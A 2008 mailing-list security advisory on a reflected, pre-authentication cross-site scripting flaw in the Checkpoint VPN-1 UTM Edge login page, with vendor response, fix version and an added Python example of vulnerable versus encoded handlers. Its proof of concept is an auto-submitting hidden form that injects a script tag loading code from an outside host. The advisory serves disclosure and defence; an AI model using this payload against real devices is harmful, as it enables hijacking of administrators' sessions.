[NEWS] Checkpoint VPN-1 UTM Edge Cross Site Scripting



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Checkpoint VPN-1 UTM Edge Cross Site Scripting
------------------------------------------------------------------------


SUMMARY

<http://www.checkpoint.com/> VPN-1 UTM Edge appliances "deliver unified
threat management to enterprises with branch offices and simplify security
deployments and manageability. VPN-1 UTM Edge appliances consolidate
proven enterprise-class technology into a single branch office solution
that does not compromise the corporate network and eliminates the branch
office as your weakest link. As part of Check Point's Unified Security
Architecture, VPN-1 UTM Edge can enforce a global security policy and
allows administrators to manage and update thousands of appliances as
easily as managing one."

Insufficient input validation and output encoding on the login page allow
an attacker to perform HTML injection by posting a suitable string to the
login form handler. The injection leads to reflected, pre-authentication
cross-site scripting.

DETAILS

Vulnerable Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.0.48x

Immune Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.5.48

Form-based authentication is used only when the device is accessed using
HTTP. Authentication over HTTPS uses HTTP basic authentication.

The device does not accept the parameters in a GET request; a POST request
has to be used instead. Exploiting the XSS vulnerability therefore requires
a bit more effort than an ordinary GET-based reflected cross-site scripting
vulnerability.

The current version can be checked from
http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is the LAN IP
address of the device. The page also displays the current product key.

Vendor response:
"Once users register the appliance and connect to the service center
(Safe@Office appliances), the latest firmware is automatically downloaded
to their appliance. For UTM-1 Edge appliances, the latest firmware version
can be downloaded from the Check Point download center. Currently, this is
version 7.5.48 that does not contain the reported issue. We believe that
customers are not exposed to this issue."

Proof of Concept:
<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">

<input name="user" value="'<script/src=//l7.fi></script>">

</form>
</body>
</html>
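
An added example (not from the advisory and not Check Point's firmware code) of the flaw class named in the summary: a login handler that reflects the posted "user" field verbatim, next to versions that apply output encoding and input validation. The template, the allow-list and the function names are assumptions; the field value is the one from the proof of concept.

```python
import html
import re
from urllib.parse import parse_qs, urlencode

# Value of the "user" field, taken from the advisory's proof of concept.
POC_USER = "'<script/src=//l7.fi></script>"
# Constructed sample: the urlencoded body a browser submits for that form.
SAMPLE_BODY = urlencode({"user": POC_USER})

# Hypothetical login template; the real firmware markup is not on the page.
TEMPLATE = "<form method='post'><input name='user' value='{user}'></form>"

# Assumed allow-list for account names (not the vendor's rule).
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")


def parse_user(body: str) -> str:
    """Extract the 'user' field from an urlencoded POST body."""
    return parse_qs(body, keep_blank_values=True).get("user", [""])[0]


def render_vulnerable(body: str) -> str:
    """Reflects the submitted value verbatim: the flaw class in the advisory."""
    return TEMPLATE.format(user=parse_user(body))


def render_encoded_only(body: str) -> str:
    """Output encoding alone, for pages that must echo arbitrary input."""
    # quote=True also encodes ' and ", so the value cannot close the attribute
    return TEMPLATE.format(user=html.escape(parse_user(body), quote=True))


def render_hardened(body: str) -> str:
    """Validate against the allow-list first, then encode what is echoed."""
    user = parse_user(body)
    if not USERNAME_RE.fullmatch(user):
        user = ""  # never echo a rejected value back to the client
    return TEMPLATE.format(user=html.escape(user, quote=True))


if __name__ == "__main__":
    for fn in (render_vulnerable, render_encoded_only, render_hardened):
        print(f"{fn.__name__:20} {fn(SAMPLE_BODY)}")
```

The leading single quote in the posted value is why the encoder must cover quote characters as well as angle brackets when the value lands inside an attribute.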

Solution:
Update to version 7.5.48

Disclosure Timeline:
19. February 2008 - Contacted Checkpoint by email
20. February 2008 - Vendor response.
6. March 2008 - Advisory was released


ADDITIONAL INFORMATION

The information has been provided by Henri Lindberg
<mailto:henri.lindberg@xxxxxxxx>.
The original article can be found at:
http://www.louhi.fi/advisory/checkpoint_080306.txt


